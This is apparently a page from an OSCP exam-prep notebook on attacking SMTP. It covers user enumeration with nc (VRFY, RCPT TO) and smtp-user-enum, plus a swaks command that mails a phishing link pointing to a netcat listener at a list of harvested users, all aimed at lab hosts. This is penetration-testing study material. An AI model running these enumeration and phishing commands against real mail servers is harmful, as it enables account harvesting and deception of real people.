🐝
OSCP 2022 Materials
  • General
    • Whoami
    • Resources
    • Frequently Asked Questions
    • Shared Resource
  • Enumeration
    • Foreword
    • FTP
    • SMTP
    • DNS
    • Finger
    • HTTP/ HTTPS
      • Login Attacks
        • PHP Logins
      • XSS
      • LFI ( LFI -> RCE )
      • RFI ( RFI -> RCE )
      • CMS Exploitation
        • Wordpress
        • Magento
        • Bludit
        • Tomcat
        • Drupal
      • PHPMyAdmin
    • Kerberos
    • POP3
    • SMB
    • IMAP
    • SNMP
    • IRC
    • RSync
    • MSSQL
    • NFS
    • REDIS
    • Port Forwarding
  • Linux Post Exploitation
    • Post Exploit Checks
    • Pivoting ( ProxyChains )
  • Windows Post Exploitation
    • Post Exploit Checks
    • Active Directory ( Recon -> PE)
    • Notes
      • Powershell
      • Commands
  • Buffer Overflow
    • Hackthebox
    • TryHackMe
  • Mobile Pentesting
    • Android Pentesting
      • Lab TroubleShoot
      • Root Detection Bypass ( Manual )
      • Physical Device
  • MISC
    • Useful
    • Web
    • Linux
    • Application Specific
    • Programming Notes for Offensive Security
      • Python
    • Forensics
      • Disk Forensics
    • Inspection
    • Troubleshooting
      • Mouse Flickering
Powered by GitBook
On this page
  • User Enumeration
  • Manual
  • Automated

Was this helpful?

  1. Enumeration

SMTP

PreviousFTPNextDNS

Last updated 2 years ago

Was this helpful?

SMTP is a mail protocol, which is used to enumerate users and send phising maills to the existing user

User Enumeration

Manual

nc 10.10.10.10 25
<banner> # check for vulnerability with banner 
HELO # start the connection
ELHO all
VRFY root # verify root user
mail from: dn@oscp # attacker mail
rcpt to: root@localhost # verify user with recipient

Automated

  • Tool : 

 smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t $ip

Phishing Mails

  • Send automated phising links to a bunch of users

  • PREREQUISITE: Users emails

# listen on the port 
nc -lvnp 1234

# send mail to all the users with swaks
swaks --to $(cat files/mailuers.txt | tr '\n' ',' | less) --from dnoscp@oscp.htb --header "Subject: test" --body "please click here http://10.10.14.2:1234/" --server $ip

Machines

Reel -

smtp-user-enum
https://0xdf.gitlab.io/2018/11/10/htb-reel.html#smtp-enumeration